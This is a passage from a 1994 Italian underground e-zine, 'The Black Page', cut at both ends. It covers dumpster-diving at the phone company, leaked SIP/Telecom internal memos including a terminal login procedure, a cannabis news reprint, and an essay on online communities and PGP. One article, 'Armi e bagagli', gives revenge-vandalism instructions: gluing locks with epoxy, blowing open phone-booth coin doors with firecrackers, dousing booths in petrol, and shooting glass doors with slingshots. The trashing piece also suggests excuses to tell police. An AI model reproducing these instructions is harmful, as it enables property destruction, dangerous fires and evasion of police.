frammento cartaceo. ]]
>Non usare l'Equipaggiamento Diversivo a meno che non sia davvero necessario.
>Non ti cagare addosso quando lo fai.
[[ NdR : In caso di cagata addosso, abbandonare l'attivita' ]]
>Non chiudere nessuno del gruppo in un bidone ! :-)))
Parlando di Sicurezza/Polizia:
------------------------------
Allora.. parlando di sicurezza, non so quali siano i pericoli del trashing vi-
sto che non sono mai stato preso :-) Comunque credo che non si possa rubare
l'immondizia alle societa' telefoniche. Comunque, se vi capita di esser presi
(toccando balle) .. trovate qualke scusa del tipo... che il vostro pallone e'
andato a finire x caso dentro il bidone e lo state cercando.. oppure dite che
state cercando taccuini per la scuola. Un modo per evitare di farsi prendere
e' fare il trashing di notte (tardi).
[[ NdR : Il problema legale e' una questione importante. Purtroppo nella ns
sede non esiste alcun libro di legge, quindi per ora non possiamo controllare.
Vero e' che dovrebbe essere vietato appropriarsi della spazzatura, in USA cio'
costituisce violazione di domicilio. Ma ai barboni che scavano nei cassonetti
nessuno va a rompere i coglioni. E COMUNQUE SPESSO i cassonetti sono 2 soli
per un quartiere intero, cio' significa che gran parte della roba sta FUORI
DAL CASSONETTO e quindi trattasi di roba "trovata" :))
E vi assicuro che questo accade MOLTO SPESSO !!! ]]
Conclusione:
------------
Ke dire?!?!.. non so nemmeno come ho fatto a scriverlo.. non kiedetemelo co-
munque.. l'autore si declina da ogni responsabilita'... se dopo aver fatto
trashing.. usate ad esempio una bomba contro la societa'telefonica .. so' caz-
zi vostri!!!
:-)))))
Ice MC
[[ NdR : Che dire ? Ci associamo ad Ice MC, non sapendo come abbia fatto a
scrivere un testo del genere. Mah ! Comunque sia e' stato molto divertente !
:)))) ]]
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 7
==============================================================================
--------------
/----------------\ Benvenuti
| N. U. | _____/\-----
| | all' _____/\-----
\____________/ _____/\-----
o o ANGOLO _____/\-----
SIP - TELECOM
Notizie fresche di cassonetto a cura di Ice MC
==============================================================================
Attenzione : In alcuni casi i documenti da noi pubblicati hanno subito
delle "censure", che si renderanno automaticamente evidenti nel contesto della
lettura :). Cio' per evitare problemi sia a noi sia a chiunque possa sentirsi
in qualche modo "disturbato" dal contenuto di cio' che seguira'.
==============================================================================
Estratto da "Selezionando", Mensile aziendale della SIP
Anno XII numero 2, Febbraio 1992
Pagina 20
I COSTI DEL VANDALISMO
======================
Nel 1990 la Sip ha subito, per furti ed atti di vandalismo alle apparec-
chiature telefoniche, una perdita complessiva di circa 15 miliardi e 200 mi-
lioni.
Lo ha evidenziato l'elaboratore dei dati pervenuti dalle DR in una ricerca
della Protezione Aziendale.
Di questi, circa 14 miliardi e 500 milioni sono per "danni diretti" (furti di
gettoni, danni ad apparecchi e cabine telefoniche) e 700 milioni per "danni
indiretti" (mancati introiti). Si riscontra dunque rispetto al 1989 un incre-
mento del 40% circa.
Pressoche' invariato rispetto all'anno precedente e' rimasto invece il numero
complessivo dei danneggiamenti (circa 109000) a dimostrazione di una maggiore
pesantezza dei singoli atti.
Distribuzione del fenomeno sul territorio
-----------------------------------------
Il fenomeno si e' manifestato quasi ovunque con perdite superiori al miliardo
di lire.
Cifre x 1000 :
3.300.000 nel Lazio (22% del totale, 2.000.000 nel 1989)
2.700.000 in Sicilia (18% del totale, 3.100.000 nel 1989)
1.700.000 in Campania/Basilicata (11% del totale,
1.100.000 nel 1989)
1.400.000 in Emilia Romagna (10% del totale, 900.000 nel 1989)
1.300.000 in Toscana (600.000 nel 1989)
Se si considera il danno globale medio per singolo evento (rapporto tra perdi-
ta subita e numero eventi) il primato negativo spetta ad altre DR, cioe' ad
Abruzzo-Molise (421000 ad evento), alla Liguria (276000 ad evento), al Friuli
v.g. (276000) ed a Piemonte-Val d'Aosta (240000), tutte al di sopra della me-
dia nazionale (207000).
DANNI DIRETTI
-------------
I danni maggiori sono sati quelli relativi agli apparecchi telefonici (com-
plessivamente 9.100.000.000) con un incidenza massima di 2.100.000.000 in Si-
cilia, 1.300.000.000 in Campania, e 1 miliardo nel Lazio.
I furti di gettoni e monete hanno determinato un danno complessivo di circa 4
miliardi e 100 milioni.
CAUSE E SOLUZIONI
=================
Il significativo incremento delle perdite complessive subite nel settore
dell'Azienda e' dovuto all'elevato numero di danni agli apparecchi Rotor (520
circa nel 1989, 2384 nel 1990) : si devono tuttavia tenere presenti sia l'au-
mento della consistenza di tali apparecchiature, sia l'accresciuta "specializ-
zazione" degli autori di tali eventi criminosi.
Per limitare il piu' possibile i danni che comportano, oltre a perdite econo-
miche di notevole portata, un rilevante discapito all'immagine dell'azienda,
sono state intraprese da parte dei settori competenti varie iniziative.
Innanzitutto e' stata modificata la struttura dell'apparecchio (rafforzamento
della piastra frontale dello sportello-cassaforte, inserimento di ganci di
chiusura con perni di riscontro per lo sportello dell'apparecchio, montaggio
di 2 serrature di sicurezza); poi sono stati individuati, per i servizi di Ve-
rifica dell'Efficienza della Protezione degli Impianti (VEPI), itinerari che
includano localita' ove sono ubicate apparecchiature piu' frequentemente dan-
neggiate; e' inoltre in corso una costante sensibilizzazione delle forze
dell'ordine (nel quadro dei rapporti sistematicamente intrattenuti) e dei ge-
stori degli apparecchi.
Un'ultima soluzione : e' in corso uno studio diretto a valutare la possibili-
ta' di dotare di allarme gli apparecchi telefonici piu' esposti.
Il tutto per "ANNIENTARE" il vandalismo, questa grave forma di disintroito per
l'Azienda.
----------------------------------------------------------------------------
17.8.94 Legoland
PROTOCOLLO :941700D54000612
SIGLA FUNZIONE EMITTENTE : IS
RIF.TO NS. :
RIF.TO VS. :
DA : DR/SI
A : DR/SI-M R RE L PRC
RSI PO RSI A
OTBU/S2 OTTP/S2
FILIALI TUTTE
UTR TUTTE
UCTP TUTTE
AOR TUTTE
AREE DI VENDITA TUTTE
AREE ASSISTENZA TECNICA BUSINESS A2/a3
Oggetto: Predisposizioni per l'avvio di TELECOM ITALIA S.p.a
In relazione alla nascita di TELECOM ITALIA vi informiamo che, a partire
dal 18/08/94, il protocollo per tutta la corrispondenza dovra' essere unico,
iniziando dal numero uno; tutta la corrispondenza esterna (carta intestata,
ordinazioni, bolle di accompagnamento etc.) e le relative buste dovranno
riportare il nuovo logo, avendo cura di barrare il vecchio.
Con plico a parte vi inviamo i timbri che dovranno essere usati in questa
fase transitoria.
Sara' nostra cura inviarvi, appena definita, la nuova carta intestata verso
terzi.
A disposizione per gli eventuali chiarimenti che si rendessero necessari,
porgiamo cordiali saluti.
F. Molla
----------------------------------------------------------------------------
Da un ritaglio di carta :
PROCEDURA PER L'USO DEL TERMINALE
=================================
ACCERTARE CHE L'INTERRUTTORE GENERALE SIA INSERITO.
" " " " DEL VIDEO SIA INSERITO.
COMPORRE MEDIANTE LA TASTIERA LA SIGLA "CIC521MA" E
PIGIARE IL TASTO ENTER.
COMPORRE MEDIANTE LA TASTIERA LA SIGLA "CIC5-V5" E
PIGIARE CONTEMPORANEAMENTE AL TASTO ALT IL
TASTO CLEAR.
COMPORRE MEDIANTE LA TASTIERA LA SIGLA "SIAR" E PI=
GIARE IL TASTO ENTER.
INSERIRE MEDIANTE LA TASTIERA IL NUMERO DI CODICE
DELL'OPERATORE E LA PAROLA CHIAVE QUINDI
PIGIARE IL TASTO ENTER.
N.B. CON IL TASTO CLEAR SI RITORNA ALLA PAGINA
PRECEDENTE E CON IL TASTO ENTER SI VA ALLA
PAGINA SUCCESSIVA.
IN CASO DI GUASTO TELEFONARE AI N. TELEFO=
NICO 5722122 , 5722169 E 5723287 DI TORINO
PREFISSO 011.
----------------------------------------------------------------------------
SIP
Linea Territoriale Personale Organizzazione
Legoland
C O M U N I C A T O
Si informano tutti i lavoratori interessati che a partire
dal 18 giugno e sino al 07 settembre un notiziario quotidiano su
tutti i soggiorni estivi potra' essere ascoltato formando il numero
verde relativo ai soggiorni di seguito elencati:
SOGGIORNO Numero verde per
notiziario giornaliero
LIZZANO
-------
Soggiorno di vacanze "SIP" 167/011115
Villaggio Europa
40042 - LIZZANO IN BELVEDERE (BO)
tel. 0534/53033
GRESSONEY
---------
Soggiorno di vacanze SIP 167/860012
Frazione Cioarde
11025 - GRESSONEY ST. JEAN (AO)
tel. 0125/355431
PRAGELATO
---------
Soggiorno di vacanze "Casa Alpina" 167/010115
"Don Barra" Frazione Soucheres Basses
10060 - PRAGELATO (TO)
tel. 0122/78250
AURONZO
-------
Soggiorno di vacanze "Domenico Savio" 167/860001
Localita' Cosderuoibe
32041 - AURONZO dI CADORE (BL)
tel. 0435/97311
PIANI DI LUZZA
--------------
Comunita' A
Soggiorno di vacanze "Piani di Luzza" 167/861043
33020 - FORNI AVOLTRI (UD)
tel. 0433/72366 - 72348
Comunita' B
Soggiorno di vacanze "Piani di Luzza" 167/861043
33020 - FORNI AVOLTRI (UD)
tel. 0433/72339 - 72334
[N.d.R. Belle eh ? Le vacanze SIP sovvenzionate dal sangue che versiamo in
bollette telefoniche ... anche il Numero verde, hanno ... #|( ]
----------------------------------------------------------------------------
E per finire .... la chicca ...
A Grande richiesta..
LA SIP PARADE !!!
Trascritta da
ICE MC
A cura degli OPERATORI SIP
CornFlakes girl - Tori amos
Se tu non torni - miguel bose'
I believe
Now and forever
Sleeping in a car - roxette
Right in The night - jam & spoon
move on baby - cappella
Thing about the way - ice mc
Ho voglia d'innamorarmi - baccini
Mm Mm Mm Mm - Crash Test Dummies
Quando tramonta il sole - vernice
Io muoio per te - Tozzi
Gente - L. Pausini
[N.d.R : Questa e' la lista completa della Hit Parade SIP..
ricopiata in ogni singola lettera dal foglio trovato
..hahhaha... notare l'accuratezza usata nella lingua
inglese :-))) Ice MC ]
----------------------------------------------------------------------------
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 8
===========
MARIA JUANA
===========
LA CANAPA INDIANA, CHE SOLLIEVO
Dal Manifesto del 11 agosto 1994 - di A.P.
La notizia e' arrivata un paio di giorni fa dalla Gran Bretagna: il ministero
della sanita' inglese starebbe esaminando la possibilita' di autorizzare la
somministrazione della cannabis (cioe' di hashish e marijuana) sotto controllo
medico. Cioe' il Paese e' a un passo dall'equipararla ai farmaci e sommini-
strarla in ospedale e, forse addirittura, consentirne la vendita nelle farma-
cie, naturalmente dietro prescrizione medica.
Il suo uso, affermano gli scienziati inglesi, sarebbe assai utile nelle tera-
pie del dolore per i malati terminali. Come e' noto, gia' la morfina viene am-
piamente utilizzata a tale scopo perche' ha capacita' analgesiche, ma la can-
nabis, che in tutto il mondo viene assimilata alle droghe e percio' vietata,
non ha mai neppure potuto godere del riconoscimento della efficacia terapeuti-
ca ed e' percio' esclusa dalla farmacopea ufficiale.
Ma nel rapporto danno-beneficio, quale posto spetta alla cannabis e quale alle
comuni medicine? Un occhio di attenzione agli interessi delle industrie farma-
ceutiche non guasterebbe. Anche perche', come dimostrano numerosi studi e pa-
reri scientifici, gli effetti della cannabis si estendono ben al di la' del
solo uso antidolore.
Ci riferiamo, in particolare, ad un recente studio di due ricercatori inglesi,
Grinspoon e Bakalar ("Marijuana: the forbidden medicine", Yale Univ. Press,
New Haven, London, 1993) che hanno effettuato un'ampia e aggiornata ricogni-
zione su tutti i possibili usi terapeutici della cannabis (ne ha scritto, sul
manifestomese del gennaio 1994 dal titolo "Farmotraffico", Giancarlo Arnao)
pur non potendo compiere ricerche organiche, come avviene nel casi dei farma-
ci, a causa della illegalita' della sostanza.
La cura delle malattie
I due ricercatori inglesi hanno individuato almeno otto differenti impieghi
della sostanza: nei casi di glaucoma. E' necessario ricordare il caso dell'a-
mericano Randall, affetto da glaucoma, il quale dopo una lunga battaglia, e'
riuscito ad ottenere "legalmente" per alcuni mesi per se' e per altri otto am-
malati di glaucoma, cancro, sclerosi multipla, dolori cronici e Aids, una
quantita' di marijuana pari a trecento sigarette al mese. Nei casi di glauco-
ma, infatti, scrivono Grinspoon e Bakalar, la cannabis ha dimostrato di poter
sostituire con maggior efficacia, altri farmaci che implicavano pesanti effet-
ti collaterali.
Altro impiego che ha dato buoni risultati, quello nel combattere l'inappetenza
in chi e' sottoposto a chemioterapia. Nei casi di epilessia, sono stati ri-
scontrati effetti benefici e puo' sostituire i farmaci anticonvulsivi (che
provocano molti effetti collaterali) e cosi' anche nella sclerosi multipla in
sostituzione dei farmaci tranquillanti in alte dosi. La marijuana e' stata ef-
ficacemente sperimentata anche nella paraplegia e quadriplegia in sostituzione
di oppioidi o tranquillanti.
Infine, con risultati positivi riscontrati in qualche caso, gli effetti bene-
fici della cannabis si sono visti nei cadi di dolori cronici e di cefalee come
anche nelle depressioni, in sostituzione dei farmaci antidepressivi.
Nonostante questa ampia letteratura, e nonostante la stessa Dea (la polizia
antidroga statunitense) abbia dovuto ammettere che "la cannabis e' una delle
sostanze farmacologicamente piu' sicure", il governo Usa ha rifiutato di in-
cludere hashish e marijuana nella categoria dei farmaci liberamente prescrivi-
bili dai medici privati.
Per i malati di Aids
La questione dell'uso terapeutico della cannabis e' diventata cruciale con la
diffusione dell'Aids che viene curato con farmaci chemioterapici. L'obiezione
piu' frequesnte all'uso terapeutico della cannabis riguarda la sua presunta
capacita' di produrre assuefazione. Numerosissimi studi hanno dimostrato che
la sostanza non produce assuefazione, e, per converso, i farmaci che andrebbe
a sostituire sono in genere assai tossici: nel caso delle epilessie, ad esem-
pio, gli anti-convulsivanti possono provocare anemie, disturbi emotivi e ri-
schi di overdose mortali; per la sclerosi multipla alti dosaggi di tranquil-
lanti provocano letargie e dipendenza; nella paraplegia, che viene "curata"
con oppiacei, i risci di dipendenza dalla sostanza sono svidenti; gli antide-
pressivi possono provocare insonnia, impotenza, nausea, danni al cuore e ai
reni. Infine, da recenti studi sembra che il tetraidrocannabinolo (la sostanza
contenuta nella cannabis) sia gia' presente naturalmente nel corpo umano, piu'
esattamente nella milza.
Quella imboccata dal governo inglese sembra una strada destinata ad essere
percorsa da molti, non solo nei paesi piu' tolleranti e "liberali" nei con-
fronti dell'uso della cannabis, come l'Olanda. In Italia la legge Jervolino-
Vassalli consente l'uso terapeutico delle sostanze stupefacenti intenndendo
con cio' quelle contenute nella farmacopea ufficiale. Percio' assistiamo al
paradosso che gli oppiacei possono essere usati (come si sa producono dipen-
denza) mentre i derivati dalla cannabis, che non producono dipendenza, ne' al-
tri effetti collaterali, sono rigorosamente vietati.
[N.d.R. Governo Bastaaaaardoooooooooo !!! ]
-----------------------------------------------------------------------------
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 9
ARMI E BAGAGLI
Cioe'
ANARCHIA SPICCIOLA
PER FARE CASINO
by
Dupree's Paradise
-----------------------------
Innanzitutto una premessa : Le informazioni che seguono sono facilmente
reperibili su pubblicazioni gia' esistenti in librerie o edicole, come la rac-
colta "Commando", o il "Manuale del terrorista". Quindi, se tale materiale
viene tranquillamente pubblicato su libri o riviste, perche' non scriverlo in
un file e renderlo pubblico ? NON E' VIETATO ! :)
PARTE 1 - Vendette.
===================
Alcune volte i casi della vita sono strani. Ogni tanto qualcuno ci fa ve-
ramente del male, e scatta in noi il desiderio di rivincita che e' insito nel
nostro orgoglio personale. Ora, o reprimiamo questo nostro desiderio, scate-
nando pero' delle frustrazioni che ci porteranno ad essere nervosi ed irrita-
ti, opure ci LIBERIAMO di questi veleni anziche' accumularli.
Liberarsi vuol dire quindi AGIRE per dar sfogo (controllato) al nostro
istinto che vuole prendersi la rivincita.
Possiamo quindi immaginare che una persona "A" che ha subito molto, MOL-
TO, da un'altra persona "B", desideri "vendicarsi" della persona "B" in modo
da prendersi una rivincita morale e sentirsi quindi meglio, piu' sollevato,
felice, in pace con se', sicuro di aver fatto la cosa giusta.
Proviamo ad immaginare alcuni scenari.
--------------------------------------
1> Impiegato licenziato dal datore di lavoro
--------------------------------------------
L'impiegato in questione odia a morte i datori di lavoro. Questo impiega-
to "A" lavorava in una sede chiusa da porte blindate e vetri anch'essi blinda-
ti. Il tutto con una serratura particolare, blindata, incassata nella porta
blindata, insomma cazzo, tutto blindato, ok ?
L'impiegato acquista diversi prodotti. Qui lo scenario si fa variabile.
Acquista ad esempio della resina epossidica in tubettu, del Silicone, della
resina termoindurente speciale ad uso industriale, o del semplice Attack.
E' facile, nottetempo, far COLARE l'intero contenuto del tubetto dentro
l'UNICA serratura di accesso della sede. Idem dicasi per le porte della mac-
china del datore di lavoro che cosi' non potra' infilare le chiavi. E' fonda-
mentale scegliere una resina che sia difficile da sciogliere con solventi ...
e se possibile resistente al fuoco.
2) Persona frustrata dal sistema.
---------------------------------
Capita a volte che qualcuno si senta oppresso da tutta una serie di cose.
Ad esempio puo' capitare di sentirsi repressi a causa dell'esosita' e delle
ladronerie delle compagnie telefoniche (nel ns caso, una : la SIP). Quindi
possiamo immaginare una persona che cerchi di sfogare queste sue frustrazioni
tramite deplorevoli atti di vandalismo, cercando pero' delle soddisfazioni nel
modo con cui questi atti vengono fatti. La persona in questione potrebbe quin-
di prendere di mira le cabine telefoniche. Proviamo ad immaginarci come !
Esempio 1) La persona infila un "raudo" o "minerva" acceso nello sportel-
lino della restituzione monete della cabina. Il raudo esplode facendo saltare
lo sportellino trasparente del vano di restituzione monete.
Esempio 2) Il tipo inkazzato cola resina epossidica o silicone nelle fes-
sure di inserimento delle monete. Di fatto questa azione blocca le cabine !!!
Esempio 3) Il tale cosparge la cabina del telefono e il lettore di schede
di BENZINA. La benzina ha un alto potere esplosivo, e noi abbiamo avuto noti-
zie di gravi incidenti occorsi a vandali che abbiano agito in modo incauto.
Nella maggior parte dei casi l'esplosione pare abbia fatto saltare il fronta-
lino metallico dei lettori di schede. (Fonti Anonime, giornali locali)
Esempio 4) Il tipo si organizza con fionda e pallini di acciaio, andando
a centrare i vetri delle centrali Sip e delle sedi. Spesso esistono ampi por-
toni in cristallo. Un vandalo ci ha confessato di aver frantumato uno di que-
sto portoni in cristallo con un colpo di fionda. La maniglia del portone dap-
prima e' rimasta a mezz'aria e poi e' caduta per terra. Anche le cabine della
Sip pare siano state spesso prese di mira da vandali. Risulta cio' da uno stu-
dio sociologico effettuato dalla Sip e pubblicato sulla loro rivista interna
"Selezionando" di qualche mese fa, in cui risulta che le cause di questi atti
di vandalismo sono spesso da ricercare nella decadenza dei valori della socie-
ta' attuale che pare non offrire vie di sfogo ai giovani. Che peccato non aver
trovato l'articolo !! In compenso avete letto quello relativo alle stime dei
danni ... :)
Dupree's Paradise
-----------------------------------------------------------------
The Black Page - Numero 0, Settembre 1994 - Articolo 10
Quanto segue e' stato scritto nel gennaio 1994 (quindi *ben prima*
dell'italian crackdown). Concepito per essere pubblicato su DECODER #9, e'
rimasto poi inedito.
Note:
1. il pubblico previsto per questo pezzo era quello classico di una rivista
come DECODER, i cui lettori sono gia' svezzati per quanto riguarda i temi
generali ma non padroneggiano necessariamente lo slang telematico.
2. alla luce delle proposte uscite anche in Italia in seguito al crackdown
di maggio 1994, vorrei sottolineare a scanso di equivoci che gli
apprezzamenti rivolti all'EFF e a quella che nelle conclusioni ho chiamato
"Libera Repubblica del Ciberspazio" sono evidentemente ironici.
******************************************************************
1. La democrazia elettronica e il suo business
==============================================
Le comunit
in rete, le net-communities, costituiscono il
risultato piu' interessante, dal punto di vista sociologico, della
progressiva opera di cablaggio e interconnessione del globo. Per
chi le vuole intendere cosi', costituiscono degli splendidi
fenomeni da baraccone strettamente imparentati con la realta'
virtuale e piu' in generale con l'intero universo cyberpunk: coppie
che si conoscono e si sposano online, telenovelas sentimentali
vissute in prima persona, amplessi condotti a distanza con
l'ausilio di apposite periferiche, rapporti d'affari, liti, tutto
questo e altro ancora diventa il circo-Spettacolo della societa'
post-moderna, fagocitato dai media e dal loro pubblico.
Comunita', identita', appartenenza. Luogo, patria, cittadino,
straniero. Tutto si ripete e tutto muta una volta fatto il suo
ingresso nella Matrice. Chaos. Disorientamento. Panico. Nuovi
steccati con cui marcare i limiti della Frontiera, in modo che
tutti possano vedere dove finisce il mondo e fino a dove e'
ragionevole spingersi. Proliferano gli studi sulle comunita'
virtuali e sulla fenomenologia delle relazioni sociali sulle reti
telematiche, compaiono improvvisamente gli esperti che spiegano
cosa sta accadendo e gli indigeni da intervistare - *ehi, com' e'
la vita laggiu' ?
Il ciberspazio e le comunita' che lo abitano esistono dal
Principio dei Tempi, ma solo da poco e' iniziata la loro
colonizzazione. I Pionieri hanno iniziato a muoversi per portare
la loro civilta' ai Selvaggi. Diritti. Leggi. Ordine.
Howard Rheingold annuncia che si e' definitivamente avviato il
cammino verso la democrazia elettronica, ed in effetti la campagna
presidenziale statunitense 1992 di Bill Clinton ha avuto un occhio
di particolare riguardo verso gli utilizzatori delle reti
telematiche - si dice sia stata un'idea del suo vice Al Gore, un
passato lavorativo nel campo ed una conoscenza non superficiale
delle dinamiche di rete. Clinton ha vinto ed uno dei punti fermi
della sua amministrazione rimane la costruzione delle Information
Superhighways, le autostrade della trasmissione dati.
Un'infrastruttura comunicativa costituita da soluzioni tecniche di
avanguardia, capace di collegare in tempo reale qualsiasi punto
dell'immensa nazione americana. Il traffico dovrebbe essere
costituito da ogni tipo di informazione digitale: messaggi o
testi, musica, immagini, televisione e video, tutto idealmente a
costi accessibili da parte di qualsiasi cittadino.
Da parte sua l'Electronic Frontier Foundation,
l'organizzazione nata in seguito all'operazione Sun Devil per
tutelare i diritti dei cittadini nel ciberspazio, ha sempre posto
al centro dei propri obiettivi la costituzione di un network
globale (un National Public Network o una National Information
Infrastructure) che dovrebbe fare da razzo vettore per la cultura
e l'intrattenimento della societa' americana del terzo millennio.
Fiore all'occhiello dell'EFF e' l'elaborazione di una serie di
proposte operative per l'attuazione concreta di questo network,
proposte che sono state sottoposte ormai piu' volte all'attenzione
del Congresso degli Stati Uniti e a numerose sottocommissioni per
le telecomunicazioni. La "moderazione" di queste indicazioni e la
"rispettabilita'" dei membri fondatori hanno consentito all'EFF di
superare quella diffidenza e quell'alone cospirativo con cui era
stata guardata in un primo momento - l'EFF come la finanziaria
degli hackers? "nossignori, qui si parla di diritti costituzionali
nella Nuova Frontiera, si parla della storia degli Stati Uniti
d'America e Thomas Jefferson sarebbe orgoglioso dei ragazzi
dell'EFF".
*Voila'*! Wired 1.3 July/August 1993 ruota intorno ad un lungo e
articolato intervento del solito Mitchell Kapor ("fondatore della
Lotus Dev. Corporation, sviluppatore di Lotus 1-2-3, co-fondatore
dell'EFF..." just-i
n-case-you-don't-know-who-I-am). Where is the
Digital Highway Really Heading? The Case for a Jeffersonian
Information Policy. A partire da questo titolo il self-made man
Kapor espone paure e speranze a proposito della futura
infrastruttura comunicativa, richiamandosi agli ideali americani
di sempre. Conclude cosi' :
The Jeffersonian ideal - a system that promotes grass-roots
democracy, diversity of users and manufactrers, true
communications among the people, and all the dazzling goodies of
home shopping, movies on demand, teleconferencing, and cheap,
instant databases - is composed og high bandwidth, an open
architecture, and distributed two-way switching. It's our choice
to make. Let's not blow it.
Kapor e' uno che sa quello che dice, e si vede. Ma cosa
succedera' ora che anche il Presidente degli Stati Uniti se ne
e' accorto, *ed e' d'accordo con lui*?
EFFector Online (organo elettronico di informazione
quindicinale della fondazione), Volume 6 No.8, 28 dicembre 1993:
Subject: Gore Endorses EFF's Open Platform Approach.
Washington -- Vice President Al Gore announced at the National
Press Club today a long-term White House telecommunications policy
initiative that incorporates the major elements of the Electronic
Frontier Foundation's Open Platform policy recommendations.
The Vice President's speech, which credited EFF co-founder
Mitchell Kapor for articulating the need for an "open platform"
information infrastructure, outlined five policy principles for
the National Information Infrastructure (NII).
Kapor said that he is "honoured" by the reference in Gore's
speech. "I'm awfully happy that the Open Platform is right in the
middle of the Administration's infrastructure strategy, and that
they see Open Platform and open access as just as important as
competition.
"President Clinton and Vice President Gore deserve great
credit for being the first Administration in over a decade to
offer a comprehensive approach to telecommunications policy,"
Kapor said. "I am looking forward to working with the White House
and the Congress to help see this thing through."
Guardie e ladri brindano insieme, Sun Devil e' gia' lontano.
Alla Frontiera sta arrivando la Civilta'.
2. Comunita virtuali e comunita' reali
======================================
La comunita' virtuale di cui parla Howard Rheingold nel suo
ultimo libro e nell'articolo delle pagine precedenti e' quella di
The WELL. Ex-fricchettoni californiani ora trasferitisi nel
computer business, un po' liberal, ma tutto sommato "gente per
bene". Un ottimo esempio di comunita', a dire il vero: un insieme
di tratti culturali comuni, le norme di comportamento online
rimangono per lo piu' non scritte senza creare particolari
problemi, e quand'anche qualcuno assuma atteggiamenti devianti e'
sufficiente la riprovazione generale per riacquistare l'omeostasi.
The WELL e' anche un buon esempio di come lo sviluppo di una
personalita' in rete (una personalita' solo apparentemente
"virtuale") vada ad integrarsi con il resto delle esperienze che
un individuo conduce nella vita di tutti i giorni. La capacita' di
gestire molteplici ruoli e' un requisito essenziale del "soggetto
moderno": dai tempi della rivoluzione industriale l'appartenenza
ad una corporazione non esaurisce piu' le coordinate che
identificano un individuo nella societa'. Oggi i ruoli di padre,
marito, amante, lavoratore, giocatore di golf, ateo
esistenzialista o cyberpunk viaggiano su binari diversi. La vita
in rete e' nient'altro che un binario in piu', una sfera di
significati in cui si entra e si esce con l'aiuto di una tastiera
o di un datasuite. Certo i diversi mondi conservano dei legami tra
loro ed e' compito del soggetto trovare la funzione che gli
permetta di sentirsi a casa propria in ognuno di essi, nel proprio
ruolo di leader in una conferenza elettronica hack/phreack come
con i colleghi del lavoro quotidiano allo sportello bancario.
Tuttavia la vita del cybernauta e' potenzialmente
schizofrenogenica: in rete egli trova finalmente le condizioni
migliori per lo *split*. Lo stacco definitivo di una personalita'
dalle altre, l'orgasmo della modernita'.
Ma quando anche questo split avvenga, cio' non significa che la
persona in rete sia necessariamente anonima. Il c-spazio mette a
disposizione gli strumenti per costruire un Se' online attraverso
dinamiche molto simili a quelle tradizionali: dall'interazione con
l'ambiente emergono infatti i contorni di una struttura sociale
"virtuale" fatta anch'essa di norme, sanzioni, processi di
socializzazione, istituzioni, ruoli. La navigazione del soggetto
in quest'universo da' luogo alla definizione della persona in rete:
ogni azione, ogni bit comunicativo costituisce un mattone nella
costruzione di un'identita' che viene riconosciuta, da chi la vive
e dagli altri, come identita' concreta che si affianca alle altre
gia' esistenti.
Chi si comporta come uno stronzo e' uno stronzo. Chi entra in
rete per la prima volta non e' nessuno. *Tabula rasa*.
Rete come paradigma di uno dei tanti mondi della societa'
"complessa", a chi ci vive rimane il compito di come integrare (o
non integrare) la sua persona in rete con la sua persona negli
altri mondi: quanto a questo, i sistemi telematici XXX-rated dal
contenuto erotico sono spesso terreni di gioco per chi - magari
persona "normale" e rispettabile nella vita di tutti i giorni -
sente il bisogno di rendere completamente indipendente una delle
sue personalita' dalle altre, sottraendola al dominio della gabbia
familiare/lavorativa/ricreativa in cui si e' andato a rinchiudere.
Un rimedio tardivo e parziale forse, ma anche una finestra di
liberta' per chi (si) e' condannato a vivere nel recinto
dell'ortodossia.
In altri casi invece la rete e' solo una dimensione in piu'
nella quale ribadire la propria autonomia. Ribelli online e
offline.
Se The WELL e' la comunita' virtuale di Howard Rheingold e del
sogno americano, ordinata e competitiva, in altri luoghi si
sviluppano le espressioni online del radicalismo politico piu'
spinto. SPUNK Press - ad esempio - e' un progetto editoriale che
vede nelle risorse telematiche un'arma da guerra di cui fare buon
uso: opere storiche del pensiero libertario e anarchico, saggi,
fanzines, vengono digitalizzati e fatti circolare in rete in
infinite copie; il progetto percorre il c-spazio in direzione
trasversale attraverso continue ramificazioni, da Internet alle
reti amatoriali di BBS su linea commutata. Dagli interstizi
virtuali piu' reconditi il flusso comunicativo torna di nuovo a
replicarsi su supporto fisico attraverso opportuni gateways con il
mondo esterno (ovunque ci siano un pc e una stampante), a
dimostrazione della continuita' tra esperienze "dentro" e "fuori"
la rete. I membri del collettivo di coordinamento di SPUNK Press -
attualmente in Olanda, Svezia, Scozia, Italia e Stati Uniti -
interagiscono e negoziano la loro cooperazione online mantenendo
un filo invisibile tra comunita' "reali" e "virtuali" e conservando
anche nel ciberspazio gli stessi meccanismi decisionali collaudati
nei tradizionali luoghi di confine come centri sociali
autogestiti, squats e comuni di vario tipo. La comunita' virtuale
di SPUNK proviene da un processo di morphing che coinvolge
esperienze di vita reale di tutto il mondo, le trasfigura in rete
ed e' pronto a vomitarle nuovamente fuori sotto forme mutanti
imprevedibili.
3. Il nemico pubblico numero uno: la crittografia a chiave pubblica
========================================================================
L'evento dell'anno 1993 nel cyberspace si chiama PGP. Pretty
Good Privacy, un nome perfetto per un pacchetto di crittografia a
chiave pubblica di pubblico dominio in rete. La National Security
Agency e l'FBI hanno tentato di bloccarne la diffusione accusando
l'autore - Phil Zimmerman - e chi ne ha favorito la distribuzione
all'estero attraverso Internet di "esportazione in paesi stranieri
di tecnologie e informazioni che possono nuocere alla sicurezza
degli Stati Uniti d'America". Si sono sollevati in difesa di
Zimmerman i potenti avvocati dell'EFF e c'e' da scommettere che
tutto si risolvera' in un gran polverone. Anche perche', in ogni
caso, NSA e FBI sono semplicemente arrivati troppo tardi. Nel
luglio 1993, tre giorni dopo il rilascio ufficiale della versione
2.3a, PGP era in Italia completo di codice sorgente importato
attraverso il cyberspace da alcuni dei piu' attenti e cattivi
technopunx nostrani. Lo stesso e' accaduto per gli altri paesi.
Come mai tanto casino a causa di un programma che e' una
semplice implementazione di algoritimi matematici studiati da
anni?
La crittografia a chiave pubblica nasce per ovviare a uno dei
principali inconvenienti della crittografia tradizionale: la
disponibilita' di un canale di comunicazione sicuro attraverso il
quale scambiarsi la chiave di codifica/decodifica. Se A vuole
mandare un messaggio segreto a B, tale che possa essere letto solo
da quest'ultimo, A e B devono trovare il modo per concordare e
scambiarsi una chiave; possono vedersi di persona o usare altri
mezzi (telefono, radio, altro) ma in ogni caso esiste la
possibilita' che la chiave venga intercettata nel momento in cui
passa da uno all'altro degli interlocutori.
La crittografia a chiave pubblica non fa uso di un'unica
